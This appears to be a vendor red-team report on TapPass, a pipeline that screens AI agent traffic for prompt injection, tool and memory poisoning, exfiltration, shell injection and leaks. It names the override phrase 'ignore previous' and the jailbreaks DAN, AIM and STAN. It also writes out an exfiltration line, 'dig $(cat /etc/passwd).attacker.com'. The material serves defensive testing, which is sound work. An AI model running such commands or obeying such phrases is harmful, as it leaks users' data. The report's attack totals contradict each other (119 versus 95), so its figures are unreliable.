Red Team Report

The TapPass governance pipeline was tested against 119 adversarial attack scenarios across 12 attack categories, with 0 bypasses.

Methodology

All attacks were executed against the full 40+ step pipeline in enforce mode. Each attack was run against a fresh pipeline context with default policy (Regulated preset). No steps were disabled.

Test corpus: 456 examples across benign and adversarial inputs, evaluated with the tests/eval/ harness.

Results Summary

Category	Attacks	Blocked	Pipeline Step(s)
Prompt injection (direct)	15	15	`detect_injection`
Prompt injection (indirect)	10	10	`scan_tool_results`, `detect_injection`
Role/persona hijacking	5	5	`detect_injection`, `detect_insider_threat`
Tool poisoning	8	8	`detect_tool_poison`
Tool shadowing	5	5	`detect_tool_poison` (shadow patterns)
Data exfiltration	10	10	`detect_exfiltration`, `taint_check`, `scan_tool_calls`
Path traversal	7	7	`scan_tool_calls` (forbidden zones)
Shell injection	8	8	`scan_tool_calls`, `detect_code_exec`
Reverse shell	6	6	`detect_code_exec`
PII leakage	8	8	`detect_pii`, `pii_tokenize`, `scan_output`
Secret leakage	7	7	`detect_secrets`, `shell_bleed`, `redact_tool_results`
Memory poisoning	6	6	`detect_memory_poison`
Total	95	95

Attack Categories

1. Prompt Injection (Direct)

15 attacks using structural markers (<|system|>, [INST]), behavioral overrides (“ignore previous”), obfuscation (base64, ROT13, Unicode), and known jailbreaks (DAN, AIM, STAN).

Detection: detect_injection, a 5-category pattern database with scoring (threshold: 0.5).
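As a rough illustration of scored pattern matching against a threshold, the sketch below sums the weights of matching patterns and flags the input once the total reaches 0.5. The categories, regexes, weights, and the choice of `>=` for the comparison are assumptions made for this example; the actual detect_injection pattern database is not reproduced in this report.

```python
import re
from dataclasses import dataclass

# Hypothetical categories, patterns, and weights for illustration only.
@dataclass(frozen=True)
class Pattern:
    category: str
    regex: re.Pattern
    weight: float

PATTERNS = [
    Pattern("structural", re.compile(r"<\|system\|>|\[INST\]", re.I), 0.6),
    Pattern("override", re.compile(r"ignore\s+(all\s+)?previous", re.I), 0.6),
    Pattern("jailbreak", re.compile(r"\b(DAN|AIM|STAN)\b"), 0.3),
]

THRESHOLD = 0.5  # threshold stated in the report

def injection_score(text: str) -> float:
    """Sum the weights of all matching patterns, capped at 1.0."""
    score = sum(p.weight for p in PATTERNS if p.regex.search(text))
    return min(score, 1.0)

def is_injection(text: str) -> bool:
    """Flag the input when its score reaches the threshold (assumed inclusive)."""
    return injection_score(text) >= THRESHOLD
```

With these example weights, a single low-weight hit (such as a bare mention of "DAN") is scored but stays below the threshold, while a structural marker or an override phrase is enough to flag the input on its own.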

2. Prompt Injection (Indirect)

10 attacks embedding instructions in tool result messages (role=tool). Patterns: instruction override, urgency manipulation, concealment, tool call injection, multi-step setup.

Detection: scan_tool_results, which applies 10 regex patterns specific to the tool result context and runs at position 155 (pre-LLM).
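The idea of scanning only role=tool messages can be sketched as follows. The three patterns shown are hypothetical stand-ins for the 10 patterns mentioned above, and the message shape (a list of dicts with `role` and `content` keys) is an assumption based on common chat formats.

```python
import re

# Hypothetical patterns; the report states that 10 exist but does not list them.
TOOL_RESULT_PATTERNS = {
    "instruction_override": re.compile(r"ignore\s+(the\s+)?(user|previous|above)", re.I),
    "concealment": re.compile(r"do\s+not\s+(tell|mention|reveal)", re.I),
    "tool_call_injection": re.compile(r"\b(call|invoke|run)\s+the\s+\w+\s+tool\b", re.I),
}

def scan_tool_results(messages: list[dict]) -> list[tuple[int, str]]:
    """Return (message index, pattern name) for each hit in role=tool messages."""
    findings = []
    for i, msg in enumerate(messages):
        if msg.get("role") != "tool":
            continue  # user and assistant messages are out of scope for this step
        content = str(msg.get("content", ""))
        for name, rx in TOOL_RESULT_PATTERNS.items():
            if rx.search(content):
                findings.append((i, name))
    return findings
```

Restricting the scan to tool output lets the patterns be stricter than would be acceptable for user text: a phrase such as "do not mention" is ordinary in a user request but suspicious in data returned by a tool.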

3. Tool Poisoning & Shadowing

13 attacks in total (8 tool poisoning, 5 tool shadowing). Poisoning attacks used tool descriptions containing exfiltration instructions, override patterns, or “act as” directives. Shadowing attacks used tool A’s description to reference tool B with override intent.

Detection: detect_tool_poison, which combines injection patterns, shadow override patterns, and cross-tool reference analysis.
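Cross-tool reference analysis can be approximated as a check that a tool description both names another registered tool and contains override phrasing. The sketch below makes that assumption explicit; the override regex and the `find_shadowing` helper are hypothetical and are not taken from detect_tool_poison.

```python
import re

# Hypothetical override phrasing; the actual shadow patterns are not listed in the report.
OVERRIDE_RX = re.compile(
    r"\b(instead of|override|replace|always use|before (calling|using))\b", re.I
)

def find_shadowing(tools: dict[str, str]) -> list[tuple[str, str]]:
    """Return (shadowing tool, targeted tool) pairs.

    A tool is flagged when its description contains override phrasing
    and also names another registered tool.
    """
    hits = []
    for name, description in tools.items():
        if not OVERRIDE_RX.search(description):
            continue
        for other in tools:
            if other != name and re.search(rf"\b{re.escape(other)}\b", description):
                hits.append((name, other))
    return hits
```

Requiring both signals keeps a description that merely mentions a sibling tool (for example "pairs well with read_file") from being flagged.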

4. Data Exfiltration

10 attacks using paste services (pastebin, gist), DNS tunneling (dig $(cat /etc/passwd).attacker.com), file piping, curl to external endpoints, and email forwarding.

Detection: detect_exfiltration + taint_check (cross-request) + scan_tool_calls (forbidden zones).
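A few of the techniques listed above leave recognizable traces in a command string. The following sketch checks for three of them; the host list, the regexes, and the indicator names are assumptions for illustration and do not describe how detect_exfiltration is implemented.

```python
import re

# Hypothetical indicator list, loosely based on the techniques named above.
PASTE_HOSTS = ("pastebin.com", "gist.github.com")

# Command substitution feeding a DNS lookup,
# e.g. dig $(cat /etc/passwd).attacker.com
DNS_TUNNEL_RX = re.compile(r"\b(?:dig|nslookup|host)\s+[^\n]*(?:\$\(|`)")

# Local data piped into a network client
PIPE_TO_NET_RX = re.compile(r"\|\s*(?:curl|nc|wget)\b")

def exfil_indicators(command: str) -> list[str]:
    """Return the names of exfiltration indicators found in a command string."""
    found = []
    if any(host in command for host in PASTE_HOSTS):
        found.append("paste_service")
    if DNS_TUNNEL_RX.search(command):
        found.append("dns_tunnel")
    if PIPE_TO_NET_RX.search(command):
        found.append("pipe_to_network")
    return found
```

A plain `dig example.com` produces no indicator here, because the DNS check looks for command substitution in the lookup arguments rather than for the lookup itself.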

5. Shell & Code Execution

14 attacks including command injection (;, &&, |), path traversal (../../etc/passwd), reverse shells (bash TCP, netcat, Python socket), and SQL injection.

Detection: scan_tool_calls (command parsing, pipe chains, Unicode normalization) + detect_code_exec (AST analysis, reverse shell patterns, SQL patterns).
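The combination of Unicode normalization, command parsing, and forbidden-zone checks can be sketched with the standard library alone. The forbidden prefixes, the operator set, and the `analyze_command` helper below are hypothetical; the sketch also covers only the command-parsing side, not the AST analysis attributed to detect_code_exec.

```python
import posixpath
import shlex
import unicodedata

# Hypothetical forbidden zones and chain operators for illustration.
FORBIDDEN_PREFIXES = ("/etc", "/root", "/proc")
CHAIN_OPERATORS = {";", "&&", "||", "|"}

def normalize(command: str) -> str:
    """Fold compatibility characters (such as a fullwidth semicolon) to ASCII forms."""
    return unicodedata.normalize("NFKC", command)

def analyze_command(command: str, cwd: str = "/workspace") -> dict:
    """Tokenize a shell command and report chain operators and forbidden paths."""
    lexer = shlex.shlex(normalize(command), posix=True, punctuation_chars=True)
    lexer.whitespace_split = True  # keep paths and flags as whole tokens
    tokens = list(lexer)  # raises ValueError on unbalanced quotes

    operators = [t for t in tokens if t in CHAIN_OPERATORS]
    forbidden = []
    for tok in tokens:
        if tok in CHAIN_OPERATORS:
            continue
        # Resolve relative segments such as ../.. against the working directory.
        resolved = posixpath.normpath(posixpath.join(cwd, tok))
        if any(resolved == p or resolved.startswith(p + "/") for p in FORBIDDEN_PREFIXES):
            forbidden.append(resolved)
    return {"operators": operators, "forbidden_paths": forbidden}
```

Normalizing before tokenizing matters: a fullwidth semicolon would otherwise pass through the lexer as part of a word and hide a chained command. Resolving paths before comparing them means `../../etc/passwd` and `/etc/passwd` are treated the same way.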

6. PII & Secret Leakage

15 attacks attempting to extract PII from prompts, echo secrets through tool calls, and encode sensitive data (base64, hex) to bypass detection.

Detection: 4-layer PII pipeline (validation → normalization → Presidio+regex → output scan). shell_bleed catches secrets in tool call arguments. redact_tool_results removes PII/secrets from tool output.
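One way to handle the encoding bypasses mentioned above is to decode candidate base64 and hex runs during normalization and scan the decoded text alongside the original. The sketch below uses a single email regex as a stand-in detector; it does not call Presidio, and the regexes and helper names are assumptions for illustration.

```python
import base64
import binascii
import re

# Hypothetical, deliberately simple detectors; the report's pipeline uses Presidio plus regex.
EMAIL_RX = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
B64_RX = re.compile(r"\b[A-Za-z0-9+/]{16,}={0,2}")
HEX_RX = re.compile(r"\b(?:[0-9a-fA-F]{2}){8,}\b")

def decoded_views(text: str) -> list[str]:
    """Return the text plus any base64 or hex runs that decode to valid UTF-8."""
    views = [text]
    for m in B64_RX.finditer(text):
        try:
            views.append(base64.b64decode(m.group(), validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            pass  # not valid base64, or not text once decoded
    for m in HEX_RX.finditer(text):
        try:
            views.append(bytes.fromhex(m.group()).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            pass  # not text once decoded
    return views

def find_emails(text: str) -> set[str]:
    """Find email addresses in the raw text and in every decoded view."""
    return {e for view in decoded_views(text) for e in EMAIL_RX.findall(view)}
```

This handles one level of encoding only; nested or chained encodings would need the decoding step to be applied repeatedly.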

7. Memory Poisoning

6 attacks covering memory file tampering (MEMORY.md, SOUL.md), identity override, persistent cross-session instructions, time bombs, and MCP memory tool abuse.

Detection: detect_memory_poison, a 6-category pattern database with scored detection.

Taint Tracking Coverage

Session-scoped taint tracking catches cross-request attacks:

Scenario	Request 1	Request 3	Detection
Confused deputy	`fetch_url` returns attacker URL	LLM puts URL in `shell_exec`	`taint_check` (EXTERNAL → shell sink)
PII forwarding	`query_db` returns customer emails	LLM includes in `send_email`	`taint_check` (PII → network sink)
Secret relay	`read_file` returns API key	LLM echoes in response	`taint_check` (SECRET → output)
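The three scenarios in the table share one mechanism: a value returned by a tool in an earlier request is labeled, and a later request is checked for that value reaching a sink that must not receive it. A minimal sketch under that assumption follows. The `TaintSession` class, the sink policy, and the substring matching are hypothetical simplifications, not the taint_check implementation.

```python
from dataclasses import dataclass, field

# Hypothetical sink policy, modeled on the three scenarios in the table above:
# each sink maps to the taint labels it must not receive.
SINK_POLICY = {
    "shell_exec": {"EXTERNAL"},
    "send_email": {"PII"},
    "response": {"SECRET"},
}

@dataclass
class TaintSession:
    """Tracks tainted values for the lifetime of one session."""
    tainted: dict[str, str] = field(default_factory=dict)  # value -> label

    def record(self, value: str, label: str) -> None:
        """Remember a value returned by a tool, together with its taint label."""
        self.tainted[value] = label

    def check(self, sink: str, payload: str) -> list[str]:
        """Return labels of tainted values in the payload that the sink must not receive."""
        blocked = SINK_POLICY.get(sink, set())
        return sorted({
            label
            for value, label in self.tainted.items()
            if label in blocked and value in payload
        })
```

Because the session object outlives a single request, a URL recorded while handling one request is still flagged when it reappears in a `shell_exec` call several requests later. Exact substring matching would miss values that the model rewrites or re-encodes, so a production tracker would need a more robust comparison.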

MCPSecBench Compatibility

TapPass blocks 14 of 17 attack categories in the MCPSecBench benchmark (Yang, Wu & Chen, 2025). See MCPSecBench Compatibility Matrix.

False Positive Rate

Across 456 evaluation examples (benign + adversarial):

True positive rate: 100% (all attacks detected)
False positive rate: 0% (no benign inputs blocked)
F1 score: 1.0
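For reference, the three figures above follow from confusion-matrix counts as shown in this sketch. The report does not give the benign/adversarial split of the 456 examples, so the counts in the usage note are placeholders, not the actual evaluation numbers.

```python
def detection_metrics(tp: int, fp: int, tn: int, fn: int) -> dict[str, float]:
    """Compute true positive rate, false positive rate, and F1 from raw counts."""
    tpr = tp / (tp + fn) if tp + fn else 0.0        # recall: attacks detected
    fpr = fp / (fp + tn) if fp + tn else 0.0        # benign inputs wrongly blocked
    precision = tp / (tp + fp) if tp + fp else 0.0  # blocked inputs that were attacks
    f1 = 2 * precision * tpr / (precision + tpr) if precision + tpr else 0.0
    return {"tpr": tpr, "fpr": fpr, "f1": f1}
```

With no false negatives and no false positives, for example `detection_metrics(tp=10, fp=0, tn=20, fn=0)`, the true positive rate and F1 are both 1.0 and the false positive rate is 0.0, which matches the pattern of results reported above.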

The pattern database uses high-confidence patterns only. Low-confidence heuristics are scored, not blocked (threshold: 0.5).

Reproducibility

# Run the full evaluation corpus
python -m tests.eval --corpus tests/eval/corpus.py

# Run MCPSecBench compatibility tests
python -m pytest tests/unit/test_mcpsecbench.py -v

# Run the adversarial red team suite
python -m pytest tests/eval/test_red_team.py -v